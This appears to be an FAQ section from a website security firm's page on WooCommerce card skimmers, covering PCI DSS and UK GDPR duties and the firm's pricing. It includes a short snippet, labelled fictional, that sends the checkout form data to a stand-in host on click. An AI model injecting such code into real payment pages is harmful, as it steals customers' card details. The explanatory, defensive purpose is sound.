How do WooCommerce card skimmers work?
A WooCommerce card skimmer is malicious JavaScript injected into the checkout. When a customer types their card details, the script copies them and sends them to a server the attacker controls, while the real payment still completes. It usually hides in a theme file, a plugin or a database option, and is often obfuscated.
# Injected into checkout (fictional, simplified)
document.querySelector('#place_order').addEventListener('click',function(){
navigator.sendBeacon('https://cdn-analytics.example.co.uk/c',new FormData(document.forms.checkout));
});
Hosted payment fields reduce the risk, but skimmers can still inject a fake payment form or capture billing details. See WooCommerce card skimmer removal for the full detection and clean-up process.
What do PCI DSS and GDPR mean for a hacked shop?
If card data or personal data may have been exposed, you have obligations under both. PCI DSS, the card industry's security standard, expects you to control scripts on payment pages and detect unauthorised changes. UK GDPR requires notifiable personal data breaches to be reported to the ICO within 72 hours of becoming aware of them.
- PCI DSS v4.0 includes requirements to inventory and authorise scripts on payment pages (6.4.3) and to detect unauthorised changes to them (11.6.1). How these apply depends on your integration and assessment type, so check with your payment provider.
- UK GDPR requires you to assess the breach and, where it is likely to result in a risk to people, report it to the ICO. The ICO publishes guidance on how to decide.
PatientZero does not certify compliance, but our reports give you the timeline, evidence and verification you need to answer both. Read GDPR breach reporting after a website hack.
Which plan suits an online shop?
A single WooCommerce shop is covered by the Single Site plan at £99 a month, plus a one-off £129.99 security audit and setup. If your shop shares a server with other sites, or you run several shops, the Server / Multi-site plan covers every site on the server and is priced on application.
- Unlimited malware removal and 24/7 monitoring on both plans
- Hardening and reinfection prevention included
- No contract, cancel any time
Already seeing a skimmer or strange checkout behaviour? Go to WooCommerce malware removal or emergency help.